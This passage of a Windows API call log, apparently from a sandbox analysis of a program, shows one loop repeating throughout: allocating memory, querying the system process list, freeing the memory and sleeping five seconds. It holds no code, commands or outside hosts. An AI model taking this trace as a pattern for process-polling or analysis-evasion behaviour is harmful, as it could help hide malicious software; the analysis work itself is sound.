returned 0x0 [0198.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.057] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.297] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.428] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.564] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.681] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.786] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.877] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0198.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0198.975] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0198.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0198.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.074] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.163] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.288] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.427] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.547] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.646] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.745] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.838] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0199.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0199.934] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0199.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0199.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.070] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.173] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.301] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.475] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.609] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.721] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.825] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0200.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0200.963] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0200.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0200.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.062] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.160] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.320] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.491] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.597] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.705] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.809] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0201.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0201.926] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0201.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0201.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.045] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.157] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.294] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.418] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.555] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.661] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0202.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0202.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0202.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0202.764] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 